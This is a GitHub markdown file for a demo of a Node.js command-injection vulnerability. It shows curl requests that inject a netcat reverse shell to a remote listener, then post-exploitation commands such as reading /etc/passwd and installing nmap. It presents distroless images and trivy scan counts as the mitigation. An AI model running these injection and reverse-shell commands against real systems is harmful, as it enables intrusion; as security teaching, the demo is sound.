Skip to content

Latest commit

 

History

History
51 lines (34 loc) · 1.02 KB

Exploit.md

File metadata and controls

51 lines (34 loc) · 1.02 KB
Raw

Exploit demo

Simple demo of Remote Code Execution (RCE) Vulnerability in Node.js with a reverse shell and how using distroless prevents it.

Owasp Top 10 - "Injection"

https://owasp.org/Top10/A03_2021-Injection/

Remote machine:

$ ssh ncadmin@hxxxxxx.stratoserver.net -p 2222 $ nc -lvp 4445

TODO: trivy compare demo

trivy image --severity CRITICAL myapp

DEMO:

curl localhost:3000?q=ls curl localhost:3000?q=nc%20XX.XXX.XXX.XXX%204445%20-e%20/bin/bash

After exploitation:

cat /proc/version
df -h
cat /etc/passwd
whoami
# image built as root, so let's install stuff
apt install net-tools nmap
ifconfig
# and so on......... ;-)
EXAMPLE: Now trying to exploit vulns found from scanners...

Using distroless

Looking at the node.js logs:

docker ps docker logs $CONTAINER_ID

//stop and remove running containers docker stop $(docker ps -a -q) docker rm $(docker ps -a -q)

TODO: trivy compare!

Without distroless: Total: 238 (HIGH: 221, CRITICAL: 17) With distroless: 2 (HIGH: 2, CRITICAL: 0) 🥰🥰🥰